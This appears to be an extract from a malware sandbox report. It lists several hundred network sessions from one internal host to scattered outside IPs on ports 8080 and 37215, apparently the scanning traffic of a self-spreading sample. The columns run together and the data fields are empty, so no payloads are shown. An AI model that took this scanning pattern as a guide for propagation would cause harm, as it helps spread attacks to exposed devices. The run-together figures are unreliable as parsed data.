                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17619192.168.2.234553414.251.12.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17620192.168.2.235079446.249.223.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17621192.168.2.2349878104.68.255.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17622192.168.2.2345736148.96.61.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17623192.168.2.2337056171.62.230.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17624192.168.2.235777453.102.66.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17625192.168.2.2360194102.64.150.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17626192.168.2.2357820173.101.113.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17627192.168.2.2347120198.246.145.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17628192.168.2.2342194210.137.68.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17629192.168.2.2354486147.178.229.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17630192.168.2.2358540148.147.5.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17631192.168.2.2357396119.59.91.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17632192.168.2.233749898.106.84.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17633192.168.2.2355516152.43.226.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17634192.168.2.235129845.126.72.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17635192.168.2.2359098124.49.10.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17636192.168.2.233611659.45.169.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17637192.168.2.233365041.213.21.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17638192.168.2.2359586197.154.159.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17639192.168.2.233867641.78.55.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17640192.168.2.2337012157.203.53.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17641192.168.2.235144441.176.136.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17642192.168.2.234381817.149.53.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17643192.168.2.233825241.74.10.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17644192.168.2.2350100197.212.122.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17645192.168.2.235422274.139.170.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17646192.168.2.2354014101.46.125.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17647192.168.2.2358548197.166.99.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17648192.168.2.233771246.216.79.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17649192.168.2.2341960197.29.216.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17650192.168.2.2334800167.225.182.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17651192.168.2.2341310157.205.30.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17652192.168.2.2347388128.116.150.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17653192.168.2.235136065.67.142.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17654192.168.2.234935841.173.96.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17655192.168.2.2355798197.217.53.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17656192.168.2.233590241.181.203.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17657192.168.2.233417240.106.84.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17658192.168.2.2360652197.142.254.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17659192.168.2.2337338197.164.27.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17660192.168.2.2344956157.205.49.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17661192.168.2.2355630193.37.109.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17662192.168.2.234590441.113.168.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17663192.168.2.2342342157.200.20.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17664192.168.2.234304091.26.235.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17665192.168.2.2349010197.193.66.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17666192.168.2.234645241.71.145.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17667192.168.2.233675046.24.45.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17668192.168.2.2356728197.132.70.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17669192.168.2.2338792157.245.138.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17670192.168.2.2345160190.1.179.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17671192.168.2.233868041.44.90.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17672192.168.2.234610841.77.206.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17673192.168.2.2359450197.57.218.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17674192.168.2.2345752197.98.152.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17675192.168.2.235642841.178.92.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17676192.168.2.2356638157.38.160.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17677192.168.2.2357260197.184.40.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17678192.168.2.2358464157.63.41.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17679192.168.2.2343860197.101.246.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17680192.168.2.2357824157.57.92.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17681192.168.2.2353892157.193.185.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17682192.168.2.2359816157.130.95.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17683192.168.2.233364041.79.14.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17684192.168.2.2356848157.59.202.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17685192.168.2.234781841.5.140.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17686192.168.2.2336492197.244.164.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17687192.168.2.233897041.206.210.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17688192.168.2.234680241.191.74.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17689192.168.2.2344732157.98.133.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17690192.168.2.235654057.169.232.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17691192.168.2.2344378197.221.188.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17692192.168.2.2359282157.24.164.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17693192.168.2.233996257.236.171.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17694192.168.2.2353242157.118.74.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17695192.168.2.2337248157.155.1.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17696192.168.2.2341348139.79.85.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17697192.168.2.235525241.58.156.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17698192.168.2.2353038178.9.115.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17699192.168.2.233481641.24.197.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17700192.168.2.233705641.254.6.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17701192.168.2.234962641.154.96.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17702192.168.2.2335146157.58.28.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17703192.168.2.2359876197.14.147.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17704192.168.2.2357970185.171.30.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17705192.168.2.2343576162.223.61.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17706192.168.2.233561241.4.35.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17707192.168.2.2359258197.107.151.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17708192.168.2.2332966197.197.168.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17709192.168.2.2333560197.113.159.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17710192.168.2.235822641.255.153.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17711192.168.2.2337774157.58.207.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17712192.168.2.235946241.220.84.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17713192.168.2.2346748157.230.74.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17714192.168.2.2358854157.244.230.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17715192.168.2.233606865.148.100.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17716192.168.2.2356430197.248.164.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17717192.168.2.2351802197.220.244.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17718192.168.2.2347296157.192.214.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17719192.168.2.235237488.86.192.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17720192.168.2.2341470197.11.38.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17721192.168.2.2356662149.221.227.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17722192.168.2.235909841.57.125.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17723192.168.2.2347064117.67.237.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17724192.168.2.2359226157.179.41.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17725192.168.2.233410241.160.234.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17726192.168.2.2342992157.255.43.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17727192.168.2.236091460.245.103.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17728192.168.2.2354174197.85.31.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17729192.168.2.2335394131.38.166.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17730192.168.2.2339736197.243.206.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17731192.168.2.235676641.101.106.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17732192.168.2.234472841.44.107.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17733192.168.2.234751841.149.26.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17734192.168.2.2345730183.212.248.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17735192.168.2.233870841.106.150.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17736192.168.2.235835269.46.54.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17737192.168.2.2346132197.129.95.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17738192.168.2.2347132106.114.224.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17739192.168.2.234473041.162.140.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17740192.168.2.23390049.228.157.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17741192.168.2.235382641.229.41.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17742192.168.2.2349748197.255.169.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17743192.168.2.2337146197.171.138.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17744192.168.2.233968641.187.15.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17745192.168.2.234892451.137.216.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17746192.168.2.2342088197.143.189.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17747192.168.2.2335530157.46.124.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17748192.168.2.233950041.83.91.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17749192.168.2.2350616197.62.199.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17750192.168.2.235499241.233.19.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17751192.168.2.2345294197.199.28.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17752192.168.2.2345384157.113.195.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17753192.168.2.233811441.142.206.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17754192.168.2.2334640157.72.152.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17755192.168.2.2355410197.148.241.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17756192.168.2.23393069.215.243.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17757192.168.2.234649632.34.46.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17758192.168.2.233626846.174.60.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17759192.168.2.2349540180.206.238.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17760192.168.2.234613666.67.79.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17761192.168.2.2349974186.154.128.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17762192.168.2.235975447.189.97.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17763192.168.2.234917441.9.105.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17764192.168.2.2358560197.130.44.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17765192.168.2.234921441.240.27.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17766192.168.2.2346882197.152.198.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17767192.168.2.2349332197.133.105.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17768192.168.2.236056081.178.48.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17769192.168.2.2333906157.124.180.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17770192.168.2.2355808157.252.237.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17771192.168.2.2352346197.13.60.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17772192.168.2.235583241.250.45.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17773192.168.2.233959041.121.164.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17774192.168.2.2356074152.221.30.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17775192.168.2.234591493.216.115.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17776192.168.2.2359370157.178.144.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17777192.168.2.235492841.96.30.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17778192.168.2.2348694121.2.237.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17779192.168.2.233462241.115.0.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17780192.168.2.2357680197.227.172.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17781192.168.2.2351072157.162.225.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17782192.168.2.2342610197.192.117.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17783192.168.2.2358280197.177.150.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17784192.168.2.233333841.166.115.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17785192.168.2.2338046157.7.54.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17786192.168.2.2358008197.207.165.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17787192.168.2.2336022164.191.81.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17788192.168.2.233566041.44.195.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17789192.168.2.2338854157.243.137.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17790192.168.2.2345112197.26.183.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17791192.168.2.234228041.65.47.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17792192.168.2.234356667.182.120.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17793192.168.2.2352718197.143.19.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17794192.168.2.2355704197.130.60.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17795192.168.2.2347370157.46.113.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17796192.168.2.2356194157.214.208.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17797192.168.2.2352778157.68.213.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17798192.168.2.235237225.133.242.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17799192.168.2.234134018.76.20.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17800192.168.2.2350114191.109.63.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17801192.168.2.2360808212.149.78.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17802192.168.2.2337054205.31.82.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17803192.168.2.2355224196.49.247.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17804192.168.2.2333818105.27.146.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17805192.168.2.234140864.25.169.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17806192.168.2.2339946111.175.178.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17807192.168.2.2341188142.148.240.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17808192.168.2.2357274120.54.150.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17809192.168.2.2337968180.5.131.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17810192.168.2.233493436.13.23.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17811192.168.2.2356628202.8.100.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17812192.168.2.2347690144.138.62.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17813192.168.2.2346254188.210.98.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17814192.168.2.2346238210.82.203.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17815192.168.2.2342324222.78.39.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17816192.168.2.235851686.36.143.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17817192.168.2.233650848.85.98.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17818192.168.2.2338406208.185.62.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17819192.168.2.2353890212.228.246.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17820192.168.2.2338600193.212.153.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17821192.168.2.2333556147.216.91.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17822192.168.2.235238240.78.237.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17823192.168.2.2345782161.240.97.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17824192.168.2.235475664.117.245.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17825192.168.2.235506491.113.156.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17826192.168.2.2338630169.40.19.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17827192.168.2.2356760186.161.67.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
